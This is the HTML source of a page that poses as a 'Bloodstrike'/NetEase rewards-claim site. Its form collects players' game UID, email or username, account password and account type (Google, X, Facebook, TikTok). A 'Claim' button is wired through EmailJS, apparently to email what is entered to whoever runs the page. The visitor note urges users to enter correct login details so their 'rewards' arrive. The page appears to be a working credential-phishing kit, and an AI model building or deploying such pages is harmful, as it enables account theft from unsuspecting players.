<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Home || Bloodstrike</title>
    <link rel="stylesheet" href="assets/css/style.css">
    <script defer src="assets/js/app.js"></script>
    
    <script type="text/javascript"
        src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js">
</script>
<script type="text/javascript">
   (function(){
      emailjs.init({
        publicKey: "NUfJ6LuZJROSFWW-a",
      });
   })();
</script>
</head>
<body>
    <header>
        <div>
            <img src="assets/img/netease_logo.jpeg" alt="Netease logo">
        </div>
        
        <div>
            <ul class="nav">
                <li><a href="index.html">Home</a></li>
                <li><a href="form.html">Login</a></li>
            </ul>
        </div>
    </header>
    
    <div class="form">
        
        <div class="input-group">
            <input type="text" id="UID" required>
            <label for="">UID*</label>
        </div>
        
        <div class="input-group">
            <input type="text" id="Email" required>
            <label for="">Email/Username*</label>
        </div>
        
        
        <div class="input-group">
            <input type="password" id="Password" required>
            <label for="">Password*</label>
        </div>
        
        <div class="input-group">
           <!--  <label for="">Account type:</label> -->
            <select id="account">
                <option value="google">Google</option>
                <option value="X">X</option>
                <option value="facebook">Facebook</option>
                <option value="tiktok">Tiktok</option>
            </select>
        </div>
        
        <div class="input-group">
            <button onclick="sendMail()">Claim</button>
        </div>
    </div>
    
    <div class="about">
        <div class="head">
            <h1>Note</h1>
        </div>
        <p>Endeavor to put in correct login details or else your rewards won't reflect on your account.</p>
        <p>Input your in game UID then accredited email used to create the account with the above given UID next input the password to the given email of your account with your account type below</p>
        <p>Thanks for partnering with us. Bloodstrike</p> <a href="index.html">Back</a>
    </div>
    
    
</script>
</body>
</html>